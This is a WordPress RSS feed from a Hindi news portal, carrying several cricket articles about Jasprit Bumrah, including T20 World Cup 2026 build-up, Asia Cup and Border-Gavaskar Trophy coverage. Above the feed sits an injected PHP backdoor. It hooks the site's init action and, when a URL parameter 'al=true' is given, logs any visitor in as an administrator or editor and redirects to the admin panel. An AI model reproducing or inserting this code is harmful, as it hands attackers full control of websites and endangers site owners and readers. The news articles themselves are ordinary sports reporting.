// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); Bumrah – प्रत्युषा आशा की नयी किरण https://pratyushaashakinayikiran.com न्यूज़ पोर्टल Sat, 07 Mar 2026 12:50:00 +0000 en-US hourly 1 https://wordpress.org/?v=7.0 फाइनल से पहले बुमराह पर न्यूजीलैंड खिलाड़ी का बड़ा बयान, बोले— दिन उनका भी आता है https://pratyushaashakinayikiran.com/?p=203110 Sat, 07 Mar 2026 12:50:00 +0000 https://pratyushaashakinayikiran.com/?p=203110 नई दिल्ली.
न्यूजीलैंड के ग्लेन फिलिप्स ने कहा कि जसप्रीत बुमराह विश्व स्तरीय गेंदबाज हैं, लेकिन उनका भी दिन खराब हो सकता है। फाइनल में यही उनकी टीम की उम्मीद है। टी20 वर्ल्ड कप 2026 का फाइनल भारत और न्यूजीलैंड के बीच खेला जाएगा। यह खिताबी मुकाबला 8 मार्च को अहमदाबाद के नरेंद्र मोदी स्टेडियम में खेला जाएगा। फाइनल मुकाबले से पहले न्यूजीलैंड के स्टार खिलाड़ी ग्लेन फिलिप्स ने भारतीय तेज गेंदबाज जसप्रीत बुमराह की तारीफ करते हुए कहा कि वह विश्व स्तरीय गेंदबाज हैं। लेकिन उनका भी दिन खराब हो सकता है। न्यूजीलैंड की टीम को उम्मीद है कि बुमराह की दिन फाइनल में खराब हो सकता है।

फिलिप्स ने कहा, “बुमराह एक शानदार गेंदबाज हैं। उनके पास कई वैरिएशन हैं और डेथ ओवरों में उनकी गेंदबाजी बेहतरीन रहती है। लेकिन वह भी इंसान हैं। उनका दिन खराब हो सकता है, जैसा हम सब के साथ होता है। हमारा काम है कि ऐसे मौकों का फायदा उठाएं।” टी20 विश्व कप 2026 में बुमराह भारत के स्टार खिलाड़ी रहे हैं। उन्होंने पाकिस्तान, दक्षिण अफ्रीका, वेस्टइंडीज और इंग्लैंड के खिलाफ शानदार प्रदर्शन किया है। डेथ ओवरों में उनकी गेंदबाजी टीम इंडिया के लिए अहम रही। जिसके कारण भारतीय टीम को रन बचाने में काफी आसानी हुई है।

बुमराह के खिलाफ मौका का फायदा उठाना होगा
फिलिप्स ने आगे बताया कि द्विपक्षीय सीरीज में उन्हें जसप्रीत बुमराह के खिलाफ कुछ हद तक सफलता मिली थी, लेकिन अब फाइनल मुकाबले में न्यूज़ीलैंड को हर उस मौके का लाभ उठाना होगा, जिसमें बुमराह चूक सकते हैं। उन्होंने कहा, “इंग्लैंड ने कल जिस तरह बुमराह के खिलाफ खेला, आखिरी दो ओवरों में खुद को मौका दिया। हमारी टीम उसी रणनीति को अपनाने की कोशिश करेगी।”

भारत के खिलाफ एक बड़ी उपलब्धि
टी20 विश्व कप 2026 के फाइनल से पहले ग्लेन फिलिप्स ने भारत के खिलाफ मुकाबले को अपने देश के लिए एक बड़ी उपलब्धि बताया। उन्होंने कहा कि भारत जैसी क्रिकेट महाशक्ति के सामने खेलना किसी भी खिलाड़ी के लिए सम्मान की बात है। फिलिप्स ने दोनों टीमों के बीच अंतर को दर्शाते हुए कहा कि उनके देश की आबादी लगभग 50 लाख है, जबकि भारत की जनसंख्या 1.4 अरब से अधिक है। उन्होंने कहा कि भारत के पास प्रतिभा का विशाल भंडार है और देश आसानी से इतनी मजबूत कई टीमें बना सकता है। ऐसे में उनके खिलाफ खेलना हमेशा चुनौतीपूर्ण और रोमांचक रहेगा।

]]>
फाइनल से पहले बुमराह पर न्यूजीलैंड खिलाड़ी का बड़ा बयान, बोले— दिन उनका भी आता है https://pratyushaashakinayikiran.com/?p=203112 Sat, 07 Mar 2026 12:50:00 +0000 https://pratyushaashakinayikiran.com/?p=203112 नई दिल्ली.
न्यूजीलैंड के ग्लेन फिलिप्स ने कहा कि जसप्रीत बुमराह विश्व स्तरीय गेंदबाज हैं, लेकिन उनका भी दिन खराब हो सकता है। फाइनल में यही उनकी टीम की उम्मीद है। टी20 वर्ल्ड कप 2026 का फाइनल भारत और न्यूजीलैंड के बीच खेला जाएगा। यह खिताबी मुकाबला 8 मार्च को अहमदाबाद के नरेंद्र मोदी स्टेडियम में खेला जाएगा। फाइनल मुकाबले से पहले न्यूजीलैंड के स्टार खिलाड़ी ग्लेन फिलिप्स ने भारतीय तेज गेंदबाज जसप्रीत बुमराह की तारीफ करते हुए कहा कि वह विश्व स्तरीय गेंदबाज हैं। लेकिन उनका भी दिन खराब हो सकता है। न्यूजीलैंड की टीम को उम्मीद है कि बुमराह की दिन फाइनल में खराब हो सकता है।

फिलिप्स ने कहा, “बुमराह एक शानदार गेंदबाज हैं। उनके पास कई वैरिएशन हैं और डेथ ओवरों में उनकी गेंदबाजी बेहतरीन रहती है। लेकिन वह भी इंसान हैं। उनका दिन खराब हो सकता है, जैसा हम सब के साथ होता है। हमारा काम है कि ऐसे मौकों का फायदा उठाएं।” टी20 विश्व कप 2026 में बुमराह भारत के स्टार खिलाड़ी रहे हैं। उन्होंने पाकिस्तान, दक्षिण अफ्रीका, वेस्टइंडीज और इंग्लैंड के खिलाफ शानदार प्रदर्शन किया है। डेथ ओवरों में उनकी गेंदबाजी टीम इंडिया के लिए अहम रही। जिसके कारण भारतीय टीम को रन बचाने में काफी आसानी हुई है।

बुमराह के खिलाफ मौका का फायदा उठाना होगा
फिलिप्स ने आगे बताया कि द्विपक्षीय सीरीज में उन्हें जसप्रीत बुमराह के खिलाफ कुछ हद तक सफलता मिली थी, लेकिन अब फाइनल मुकाबले में न्यूज़ीलैंड को हर उस मौके का लाभ उठाना होगा, जिसमें बुमराह चूक सकते हैं। उन्होंने कहा, “इंग्लैंड ने कल जिस तरह बुमराह के खिलाफ खेला, आखिरी दो ओवरों में खुद को मौका दिया। हमारी टीम उसी रणनीति को अपनाने की कोशिश करेगी।”

भारत के खिलाफ एक बड़ी उपलब्धि
टी20 विश्व कप 2026 के फाइनल से पहले ग्लेन फिलिप्स ने भारत के खिलाफ मुकाबले को अपने देश के लिए एक बड़ी उपलब्धि बताया। उन्होंने कहा कि भारत जैसी क्रिकेट महाशक्ति के सामने खेलना किसी भी खिलाड़ी के लिए सम्मान की बात है। फिलिप्स ने दोनों टीमों के बीच अंतर को दर्शाते हुए कहा कि उनके देश की आबादी लगभग 50 लाख है, जबकि भारत की जनसंख्या 1.4 अरब से अधिक है। उन्होंने कहा कि भारत के पास प्रतिभा का विशाल भंडार है और देश आसानी से इतनी मजबूत कई टीमें बना सकता है। ऐसे में उनके खिलाफ खेलना हमेशा चुनौतीपूर्ण और रोमांचक रहेगा।

]]>
बुमराह ने भारत को दिलाई पहली सफलता, हार्दिक ने संभाली अटैक की कमान https://pratyushaashakinayikiran.com/?p=184496 Wed, 10 Sep 2025 15:14:00 +0000 https://pratyushaashakinayikiran.com/?p=184496 नई दिल्ली 
आज टी20 एशिया कप 2025 में भारत और यूएई के बीच मुकाबला खेला जा रहा है। ग्रुप ए का हिस्सा दोनों टीमों की दुबई इंटरनेशनल क्रिकेट स्टेडियम में टक्कर हो रही है। भारत ने टॉस जीतकर बॉलिंग चुनी है। सूर्यकुमार यादव की कप्तानी वाली भारतीय टीम की टूर्नामेंट में तूफानी आगाज पर नजर है। भारत डिफेंडिंग चैंपियन है। भारत ने एशिया कप इतिहास में सर्वाधिक आठ खिताब जीते हैं। यह भारत का टी20 इंटरनेशनल क्रिकेट में यूएई के खिलाफ दूसरा मैच है। भारत के लिए यूएई के खिलाफ मैच 14 सितंबर को पाकिस्तान के खिलाफ होने वाले हाई वोल्टेज मुकाबले से पहले अभ्यास मैच की तरह है। शुभमन गिल की सबसे छोटे फॉर्मेट में वापसी के बाद विकेटकीपर संजू सैमसन की प्लेइंग इलेवन में जगह को लेकर असमंजस था। हालांकि, टीम मैनेजमेंट ने संजू पर भरोसा बरकरार रखा है। गिल बुधवार को ओपनर के रूप में उतरेंगे जबकि संजू मध्यक्रम में आएंगे।

बुमराह ने दिलाई पहली सफलता
जसप्रीत बुमराह ने भारत को पहली सफलता दिलाई है। उन्होंने चौथे ओवर की चौथी गेंद पर अलीशान शराफू को बोल्ड किया। शराफू ने 17 गेंदों में तीन 22 रन बनाए, जिसमें तीन चौके और एक सिक्स शामिल हैं। उन्होंने वसीम के संग 26 रनों की साझेदारी की।

हार्दिक ने संभाली अटैक की कमान
यूएई की पारी शुरू हो गई है। मुहम्मद वसीम और अलीशान शराफू बैटिंग करने उतरे हैं। तेज गेंदबाजी ऑलराउंडर हार्दिक पांड्या ने बॉलिंग अटैक की कमान संभाली। उन्होंने पहले ओवर में 10 रन खर्च किए। शराफू ने दो चौके लगाए और डबल निकाला।

]]>
शाहीन अफरीदी की तारीफ: जसप्रीत बुमराह को दिए 10 में 10 नंबर https://pratyushaashakinayikiran.com/?p=169413 Thu, 10 Jul 2025 08:27:00 +0000 https://pratyushaashakinayikiran.com/?p=169413 नई दिल्ली
पाकिस्तान के स्टार तेज गेंदबाज शाहीन शाह अफरीदी ने भारत के स्पीड स्टार जसप्रीत बुमराह की शान में कसीदे पढ़े हैं। उन्होंने भारतीय स्टार को परफेक्ट बोलर बताते हुए दुनिया का बेस्ट गेंदबाज करार दिया है। पाकिस्तान के बाएं हाथ के तेज गेंदबाज अफरीदी का एक वीडियो इंटरनेट पर वायरल है जिसमें वह बुमराह को 10 में से 10 नंबर देते दिख रहे हैं। अफरीदी पाकिस्तान के टी-20 कैप्टन भी रह चुके हैं। उनसे पूछा जाता है कि बुमराह को 10 में से कितने अंक देंगे तो उनका जवाब था 10 नंबर। इसकी वजह पूछने पर अफरीदी ने बताया, 'असल में वह मौजूदा समय के सर्वश्रेष्ठ गेंदबाज हैं। स्विंग, सटीकता, अनुभव। मुझे लगता है कि वह मौजूदा दौर के दुनिया के बेस्ट गेंदबाज हैं।'

31 साल के जसप्रीत बुमराह ने टेस्ट, वनडे और टी-20 तीनों ही फॉर्मेट में अपनी जबरदस्त छाप छोड़ी है। उन्होंने अब तक 46 टेस्ट मैच खेले हैं जिनमें उनके नाम 210 विकेट हैं। इस दौरान उन्होंने 14 बार 5 विकेट हॉल लिए हैं। अब तक 89 ओडीआई में उनके नाम 149 विकेट हैं। बुमराह ने 70 टी-20 इंटरनेशनल मैचों में 89 विकेट लिए हैं। जसप्रीत बुमराह ने एंडरसन-तेंदुलकर ट्रॉफी के पहले टेस्ट मैच में पारी में 5 विकेट लिए थे। हालांकि, लीड्स टेस्ट में भारत हार गया था। वह एजबेस्टन में खेले गए दूसरे टेस्ट में नहीं खेले थे। लॉर्ड्स टेस्ट में वह भारतीय टीम का हिस्सा होंगे।

2024-25 के बॉर्डर-गावस्कर ट्रॉफी में जसप्रीत बुमराह ने ऑस्ट्रेलिया के खिलाफ सभी 5 टेस्ट मैच खेले थे। इस दौरान उन्होंने 32 विकेट झटके। 2024 में उन्होंने इंटरनेशनल क्रिकेट में सबसे ज्यादा विकेट लिए थे। उन्हें पिछले साल आईसीसी ने क्रिकेटर ऑफ द ईयर और टेस्ट क्रिकेटर ऑफ द ईयर अवॉर्ड से नवाजा था। बुमराह 2025 का चैंपियंस ट्रॉफी लोवर बैक इंजरी के कारण नहीं खेल पाए थे। इस वजह से वह आईपीएल 2025 के शुरुआती मैचों में भी मुंबई इंडियंस के लिए नहीं खेल पाए थे।

 

]]>
भारत ने ऑस्ट्रेलिया को 181 रनों पर समेटा, सिडनी टेस्ट में पहली पारी में मिली लीड, ताबड़तोड़ शुरुआत, यशस्वी ने पहले ही ओवर में जड़े 16 रन, बुमराह इंजर्ड https://pratyushaashakinayikiran.com/?p=117308 Sat, 04 Jan 2025 11:36:00 +0000 https://pratyushaashakinayikiran.com/?p=117308 सिडनी
 भारतीय गेंदबाजों ने सिडनी टेस्ट में ऑस्ट्रेलिया की पहली पारी को 181 रनों पर सिमट दिया है। 39 के स्कोर पर 4 बल्लेबाजों के आउट होने के बाद ऑस्ट्रेलिया ने अच्छी वापसी की। एक समय लग रहा था कि वह भारत के स्कोर से आगे निकल जाएंगे। जसप्रीत बुमराह भी मैदान से बाहर थे। इसके बाद भी भारतीय गेंदबाजों ने जोरदार वापसी करते हुए पारी को समेट दिया। पहली पारी में 185 रन बनाने वाले टीम इंडिया को 4 रनों की बढ़त मिली।

अब भारतीय टीम अपनी दूसरी पारी में बल्लेबाजी कर रही है. व‍िराट कोहली और शुभमन ग‍िल क्रीज पर हैं. भारत के 2 व‍िकेट ग‍िर चुके हैं. भारत का दूसरी पारी में स्कोर 50 रन के करीब है. भारत को पहली पारी में महज 4 रनों की बढ़त म‍िली.

पर्थ में भारत ने पहला टेस्ट 295 रनों से मैच जीता. फ‍िर एड‍िलेड टेस्ट ऑस्ट्रेल‍िया ने 10 विकेट से जीता. इसके बाद ब्रिस्बेन टेस्ट ड्रॉ रहा. मेलबर्न में ऑस्ट्रेल‍िया ने 184 रनों से धांसू जीत दर्ज की. सिडनी टेस्ट के दूसरे दिन के खेल से जुड़ी अपडेट के लिए इस पेज को रिफ्रेश करते रहिए…

भारत की दूसरी पारी

भारत ने दूसरी पारी में ताबड़तोड़ शुरुआत की. यशस्वी जायसवाल ने दूसरी पारी में स्टार्क के पहले ही ओवर में 16 रन जड़ द‍िए. लेकिन भारतीय टीम को पहला झटका केएल राहुल के रूप में लगा, ज‍िन्हें स्कॉट बोलैंड ने बोल्ड कर द‍िया. पहले व‍िकेट के ल‍िए राहुल और यशस्वी के बीच 45 गेंदों पर 42 रनों की पार्टनरश‍िप हुई. राहुल के आउट होने के बाद यशस्वी (22) भी बोलैंड का श‍िकार बने.  

भारत का स्कोरकार्ड, दूसरी पारी

बल्लेबाज         विकेट                      रन
केएल राहुल      बोल्ड बोलैंड              13
यशस्वी जायसवाल     बोल्ड बोलैंड       22

बुमराह हुए इंजर्ड, जानें क्या हुआ?

जसप्रीत बुमराह इस मुकाबले में फ‍िलहाल मैदान से बाहर हैं. वह स्कैन करवाने के ल‍िए गए हैं. बॉर्डर-गावस्कर ट्रॉफी के पांचवें और अंतिम टेस्ट मैच में भारतीय कप्तान जसप्रीत बुमराह को शन‍िवार (4 जनवरी) को चोट का सामना करना पड़ा. उनकी जगह विराट कोहली ने कमान संभाली.

ऑस्ट्रेल‍िया की पहली पारी 181 रनों पर ऑलआउट
ऑस्ट्रेल‍िया  की पहली पारी भी 181 रनों पर स‍िमट गई. ऑस्ट्रेल‍िया की ओर से पहली पारी में ब्यू वेबस्टर ने ने सर्वाध‍िक 57 रनों की पारी खेली. पहली पारी में भारत की ओर से मोहम्मद स‍िराज और प्रस‍िद्ध कृष्णा को 3-3 विकेट म‍िले. वहीं कप्तान जसप्रीत बुमराह और नीतीश राणा ने 2-2 सफलताएं अर्ज‍ित कीं.  

 

]]>
स्मिथ को घर में जो ‘जख्म’ बुमराह ने दिया, वो कभी नहीं भरेगा, ये रिकॉर्ड भारतीय फैंस को करेगा गदगद https://pratyushaashakinayikiran.com/?p=107160 Sat, 07 Dec 2024 14:17:00 +0000 https://pratyushaashakinayikiran.com/?p=107160 एडिलेड
भारत के धाकड़ तेज गेंदबाज जसप्रीत बुमराह के सामने टिकना दिग्गज बल्लेबाजों के लिए किसी चुनौती से कम नहीं होता। वह दुनियाभर में अपनी धाक जमा चुके हैं। बुमराह ने फिलहाल ऑस्ट्रेलिया दौर पर अपनी खतरनाक गेंदों से कंगारू प्लेयर्स की नींद उड़ा रखी है। उन्होंने पर्थ में धमाल मचाने के बाद एडिलेड में खेले जा रहे दूसरे टेस्ट में भी ऑस्ट्रेलिया की नाक में दम किया है। बुमराह ने डे-नाइट टेस्ट के दूसरे दिन 'फैब फोर' में शामिल स्टीव स्मिथ को सस्ते में निपटाया। स्मिथ 11 गेंदों में महज 2 रन ही बना सके। बुमराह ने घर में स्मिथ को जो 'जख्म' दिया है, वो कभी नहीं भरने वाला।

बुमराह ने ऑस्ट्रेलिया की पहली पारी के 41वें ओवर की पहली गेंद लेग स्टंप पर गुड लेंथ पर डाली। दाएं हाथ के बल्लेबाज स्मिथ ने बल्ला चलाया, जिसका खामियाजा भुगतना पड़ा। गेंद बल्ले का महीन लेकर विकेट के पीछे चली गई और कीपर ऋषभ पंत ने डाइव लगाकर कैच लपक लिया। इसी के साथ बुमराह ने 35 वर्षीय स्मिथ के खिलाफ एक शानदार रिकॉर्ड बनाया, जो भारतीय फैंस को गदगद कर देगा। वह स्मिथ को ऑस्ट्रेलियाई सरजमीं पर टेस्ट में तीन बार आउट करने वाले दुनिया के पहले गेंदबाज बन गए हैं। बुमराह ने पर्थ टेस्ट में स्मिथ को गोल्डन डक पर आउट किया था।
 
बुमराह ने पर्थ, एडिलेड के अलावा स्मिथ का मेलबर्न क्रिकेट ग्राउंट (एमसीजी) में शिकार किया। ऑस्ट्रेलियाई दिग्गज के बल्ले से 2020 में एमसीजी में महज 8 रन निकले थे। भारत के अनुभवी स्पिनर रविचंद्रन अश्विन ने स्मिथ को 2020-21 में ऑस्ट्रेलिया दौरे दो बार अपना शिकार बनाया। एडिलेड टेस्ट की बात करें तो बुमराह ने ऑस्ट्रेलिया के ओपनर उस्मान ख्वाजा (13) और नाथन मैकस्वीनी (39) को भी अपने जाल में फंसाया। भारत के 180 के जवाब में ऑस्ट्रेलियाई टीम ने पहली पारी में 5 विकेट गंवाकर 208 रन जुटाए। मार्नस लाबुशेन ने 64 रन बनाए, जिन्हें नीतीश रेड्डी ने आउट किया।

]]>
पर्थ टेस्ट में कप्तान होंगे जसप्रीत बुमराह, गौतम गंभीर ने किया कंफर्म https://pratyushaashakinayikiran.com/?p=96867 Mon, 11 Nov 2024 13:06:00 +0000 https://pratyushaashakinayikiran.com/?p=96867 मुंबई

 भारत बनाम ऑस्ट्रेलिया बॉर्डर गावस्कर ट्रॉफी से पहले भारतीय पुरुष क्रिकेट टीम के मुख्य कोच गौतम गंभीर ने पुष्टि की है कि अगर रोहित शर्मा निजी कारणों से ऑस्ट्रेलिया के खिलाफ पहले टेस्ट में नहीं खेल पाते हैं तो स्टार तेज गेंदबाज जसप्रीत बुमराह भारतीय टीम की अगुआई करेंगे। सोमवार (11 नवंबर) को मुंबई में बॉर्डर-गावस्कर ट्रॉफी के लिए रवाना होने से पहले प्रेस कॉन्फ्रेंस में पत्रकारों से बात करते हुए गंभीर ने कहा, "अगर रोहित शर्मा उपलब्ध नहीं होते हैं तो पर्थ में पहले टेस्ट मैच में जसप्रीत बुमराह भारत की कप्तानी करेंगे।" इस दौरान गंभीर ने कहा कि खिलाड़ियों के साथ मेरी बातचीत केवल भारतीय क्रिकेट को आगे बढ़ाने को लेकर होती है। यही टीम खेल होता है। इसमें टीम पहले होती है।

गंभीर ने कहा कि अगर रोहित शर्मा ऑस्ट्रेलिया के खिलाफ पहले टेस्ट मैच के लिए उपलब्ध नहीं होते तो केएल राहुल और अभिमन्यु ईश्वरन सलामी बल्लेबाज के विकल्प होंगे। उन्होंने कहा कि मैं किसी तरह का दबाव महसूस नहीं कर रहा हूं, भारत का कोच बनना सम्मान और सौभाग्य की बात है। कोच ने कहा कि हम जिन आलोचनाओं का सामना कर रहे हैं हमें वह स्वीकार हैं। हमें अब आगे बढ़ना होगा। ऑस्ट्रेलिया एक नई सीरीज है।

भारतीय टीम के मुख्य कोच गौतम गंभीर ने ऑस्ट्रेलिया के पूर्व कप्तान रिकी पोंटिंग की आलोचना के बाद सीनियर बल्लेबाजों विराट कोहली और रोहित शर्मा का समर्थन किया है। उन्होंने कहा कि रिकी पोंटिंग को ऑस्ट्रेलियाई क्रिकेट के बारे में सोचना चाहिए। वह भारतीय क्रिकेट को लेकर क्यों चिंतित हैं। विराट और रोहित वापसी करेंगे। पोंटिंग ने हाल ही में कहा था कि विराट ने पिछले पांच सालों में केवल दो टेस्ट शतक बनाए हैं। यह मुझे सही नहीं लगा, लेकिन अगर यह सही है, तो मेरा मतलब है, यह चिंता का विषय है।

प्रेस कॉन्फ्रेंस में गौतम गंभीर ने कहा, "पहली और सबसे बड़ी चुनौती निश्चित रूप से परिस्थितियां हैं। क्योंकि जब आप भारत में खेलते हैं तब ऑस्ट्रेलिया की तुलना में परिस्थितियां पूरी तरह से अलग होती हैं। मुझे लगता है कि अगर हम सीरीज शुरू होने से पहले 10 दिन अच्छी तैयारी कर पाते हैं, तो हम अच्छी स्थिति में होंगे। हमारे पास कई अनुभवी खिलाड़ी हैं जो कई बार ऑस्ट्रेलिया जा चुके हैं। इसलिए उनका अनुभव युवा खिलाड़ियों के काम आएगा। ये 10 दिन बहुत महत्वपूर्ण होने वाले हैं। 22 तारीख की सुबह हमें पूरी तरह से तैयार रहना चाहिए और पहली गेंद से ही धमाकेदार शुरुआत करनी चाहिए।"

न्यूजीलैंड के साथ सीरीज में टीम इंडिया के प्रदर्शन पर गौतम गंभीर ने कहा, "हमें जो आलोचना मिल रही है, हम उसे स्वीकार करते हैं। हम आगे बढ़ते रहते हैं, और हर दिन बेहतर होते रहते हैं। मुझे पता है कि हमने अपना सर्वश्रेष्ठ क्रिकेट नहीं खेला है, लेकिन इससे कुछ भी नहीं बदलता। ऑस्ट्रेलिया एक नई सीरीज और एक नया प्रतिद्वंद्वी है। हम यह सोचकर मैदान पर उतरते हैं कि हम निश्चित रूप से उस सीरीज को जीतने की कोशिश करेंगे।"

'सीनियर खिलाड़ी रन बनाने के लिए भूखे हैं'

गंभीर ने हाल में खराब प्रदर्शन के कारण दबाव में चल रहे कप्तान रोहित शर्मा और स्टार बल्लेबाज विराट कोहली का बचाव करते हुए कहा कि यह दोनों सीनियर खिलाड़ी रन बनाने के लिए भूखे हैं और ऑस्ट्रेलिया में दमदार वापसी करेंगे। गंभीर ने इन बातों को भी खारिज कर दिया कि न्यूजीलैंड के खिलाफ घरेलू सीरीज में तीनों टेस्ट मैच गंवाने के बाद भारतीय टीम दबाव में है। भारत और ऑस्ट्रेलिया के बीच पहला टेस्ट मैच 22 नवंबर से पर्थ में खेला जाएगा।

गंभीर से जब पूछा गया कि क्या उन्हें डंकन फ्लेचर के समय जैसा दबाव महसूस होता है जब टीम बदलाव के दौर में थी, उन्होंने कहा, "मैं बदलाव के बारे में नहीं बल्कि पांच टेस्ट मैचों के बारे में सोच रहा हूं। बदलाव हो या न हो, अगर ऐसा होना है तो होगा, लेकिन मैं भारतीय टीम में कुछ ऐसे अविश्वसनीय खिलाड़ियों को देख रहा हूं जो अच्छा प्रदर्शन करने के लिए बेताब हैं।"

भारतीय कोच ने यह भी पुष्टि की है कि अगर रोहित शर्मा निजी कारणों से पहले टेस्ट मैच में नहीं खेल पाते हैं तो उप कप्तान जसप्रीत बुमराह टीम की कमान संभालेंगे। उन्होंने यह भी कहा कि टीम के पास सलामी बल्लेबाज के स्थान के लिए केएल राहुल और अभिमन्यु ईश्वरन के रूप में विकल्प के रूप में मौजूद हैं।

हमें सही समय पर सही सवाल पूछने चाहिए: पोंटिंग

अगर रोहित मैच में नहीं खेलते हैं तो टीम की अगुआई की जिम्मेदारी उप-कप्तान बुमराह पर होगी. पोंटिंग ने कहा कि 30 वर्षीय बुमराह के पास भारतीय तेज गेंदबाजी आक्रमण की अगुआई करते हुए टीम की कप्तानी की जिम्मेदारियों को संभालने का काफी अनुभव है. उन्होंने कहा कि भारतीय टीम में उसके लिये काफी सारे अनुभवी खिलाड़ी मौजूद हैं और मुझे लगता है कि यह बहुत महत्वपूर्ण है कि आप इस अनुभव का इस्तेमाल करें. भले ही आप कप्तान हों. पोंटिंग ने कहा कि हमें सही समय पर सही सवाल पूछने चाहिए, क्योंकि चाहे हमने कितना भी क्रिकेट खेला हो, हम हमेशा सही नहीं होते.

बुमराह में है मुश्किल परिस्थितियों से उबरने की क्षमता

खेल के लंबे प्रारूप में बुमराह अब भी भारत के सर्वश्रेष्ठ तेज गेंदबाज बने हुए हैं और वह आईसीसी टेस्ट सूची में तीसरे स्थान पर काबिज है. पोंटिंग का मानना ​​​​है कि बुमराह में मुश्किल परिस्थितियों से उबरने की काबिलियत है. उन्होंने यह भी कहा कि बुमराह जैसे खिलाड़ी अतिरिक्त दबाव और जिम्मेदारी में अच्छा खेल दिखाते हैं. वैसे भी वह हमेशा लंबे समय से तेज गेंदबाजी आक्रमण का नेतृत्व करते रहे हैं. भले ही यह लाल गेंद का क्रिकेट हो, टी20 हो या फिर वनडे. वह मुख्य खिलाड़ी हैं. ऑस्ट्रेलिया दौरे के लिए भारतीय टीम निकल चुकी है. भारत को लगभग 1.5 महीने के इस दौरे पर पांच टेस्ट खेलने हैं. टीम में कुछ नए खिलाड़ियों को भी मौका मिल सकता है.

ऑस्ट्रेलिया दौरे के भारतीय टीम की स्क्वाड:

रोहित शर्मा (कप्तान), जसप्रीत बुमराह (उपकप्तान), विराट कोहली, केएल राहुल, ऋषभ पंत (विकेटकीपर), शुभमन गिल, यशस्वी जयसवाल, अभिमन्यु ईश्वरन, सरफराज खान, ध्रुव जुरेल (विकेटकीपर), आर अश्विन, रवींद्र जडेजा, वाशिंगटन सुंदर, मोहम्मद सिराज, आकाश दीप, प्रसिद्ध कृष्णा, हर्षित राणा, नितीश कुमार रेड्डी.

रिजर्व खिलाड़ी: मुकेश कुमार, नवदीप सैनी और खलील अहमद.

]]>
टी-20 अंतरराष्ट्रीय में भारत के लिए तीसरे सबसे ज्यादा विकेट लेने वाले गेंदबाज बने जसप्रीत बुमराह https://pratyushaashakinayikiran.com/?p=40017 Tue, 11 Jun 2024 09:26:00 +0000 https://pratyushaashakinayikiran.com/?p=40017 न्यूयॉर्क

 भारतीय तेज गेंदबाज जसप्रीत बुमराह टी-20 अंतरराष्ट्रीय क्रिकेट में भारत के लिए तीसरे सबसे ज्यादा विकेट लेने वाले गेंदबाज बन गए हैं। बुमराह ने इस मामले में हार्दिक को पीछे छोड़ दिया है।

बुमराह ने यह उपलब्धि न्यूयॉर्क के नासाउ काउंटी इंटरनेशनल स्टेडियम में आईसीसी टी20 विश्व कप मुकाबले में पाकिस्तान के खिलाफ मैच में हासिल की। भारत ने यह मैच छह रन से जीता।

बुमराह ने मैच में 3.50 की इकॉनमी रेट से चार ओवर में सिर्फ 14 रन देकर तीन विकेट लिए। बुमराह ने कप्तान बाबर आजम, मोहम्मद रिजवान और इफ्तिखार अहमद के विकेट लिए।

बुमराह ने 64 टी-20 अंतरराष्ट्रीय में 18.67 की औसत और 6.44 की इकॉनमी रेट से 79 विकेट लिए हैं, जिसमें 3/11 का सर्वश्रेष्ठ आंकड़ा है। हार्दिक ने 94 टी-20 अंतरराष्ट्रीय में 4/16 के सर्वश्रेष्ठ आंकड़ों के साथ 78 विकेट लिए हैं।

टी-20 प्रारूप में भारत के लिए अग्रणी विकेट लेने वाले स्पिन अनुभवी युजवेंद्र चहल हैं, जिन्होंने 80 खेलों में 25.09 की औसत और 8.19 की इकॉनमी रेट से 6/25 के सर्वश्रेष्ठ आंकड़ों के साथ 96 विकेट लिए हैं। दूसरे स्थान पर भारत के स्विंग विशेषज्ञ भुवनेश्वर कुमार हैं, जिन्होंने 87 मैचों में 23.10 की औसत और 6.96 की इकॉनमी रेट से 90 विकेट लिए हैं, तथा उनका सर्वश्रेष्ठ प्रदर्शन 5/4 रहा है।

न्यूजीलैंड के अनुभवी तेज गेंदबाज टिम साउथी टी-20 अंतरराष्ट्रीय क्रिकेट में सर्वाधिक विकेट लेने वाले गेंदबाज हैं, जिन्होंने 123 मैचों में 23.15 की औसत और 8.13 की इकॉनमी रेट से 157 विकेट लिए हैं, जिसमें उनका सर्वश्रेष्ठ प्रदर्शन 5/13 रहा है।

 

मुश्किल समय में गेंदबाजों ने पाकिस्तान के खिलाफ धैर्य बनाए रखा : बुमराह

 टी20 विश्व कप में अपने 4 ओवर में मात्र 14 रन पर तीन विकेट लेने वाले भारत के तेज गेंदबाज जसप्रीत बुमराह ने पाकिस्तान के खिलाफ गेंदबाजों के प्रदर्शन की सराहना की है। जसप्रीत बुमराह ने अपने चार ओवरों में 14 रन देकर 3 विकेट लिए, जिसमें 15 डॉट बॉल शामिल थे।

पाकिस्तान को सिर्फ 36 गेंदों पर 40 रन चाहिए थे, बुमराह ने अच्छी तरह से सेट मोहम्मद रिजवान को आउट कर भारत की जीत मुमकिन की। इसके बाद 119 रन का पीछा कर रही पाकिस्तान की टीम 7 विकेट पर 113 रन ही बना पाई।

बुमराह ने मैच के बाद कहा, "हमारे लिए सबसे अच्छी बात यह रही कि हम कूल रहे। जब हम सुबह बल्लेबाजी कर रहे थे तो गेंदबाजों को मदद मिल रही थी। लेकिन जब हम गेंदबाजी करने आए, तो गेंद सीम नहीं कर रही थी।

"इसलिए, हमें अधिक स्टेबल और सटीक होना था। हम एक इकाई के रूप में बहुत शांत और स्पष्ट थे कि हम क्या करना चाहते हैं। इसलिए, हम बहुत खुश हैं कि एक टीम के रूप में हम योगदान करने में सक्षम थे और उस दबाव को बनाया और फिर हम जीत हासिल करने में सक्षम हुए।"

पिछले साल बुमराह पीठ की चोट से उबर रहे थे, जिसके कारण वो टी20 विश्व कप 2022 से बाहर थे और घरेलू धरती पर वनडे विश्व कप 2023 में उनके खेलने पर भी संदेह था। लेकिन अब बुमराह अपनी बेहतरीन फॉर्म में हैं और भारत को मैच जिताने में अहम भूमिका निभा रहे हैं।

बुमराह ने हार्दिक पांड्या, मोहम्मद सिराज, अक्षर पटेल और अर्शदीप सिंह की भी तारीफ की, जिन्होंने भारत को पाकिस्तान के खिलाफ जीत दिलाने में अहम भूमिका निभाई।

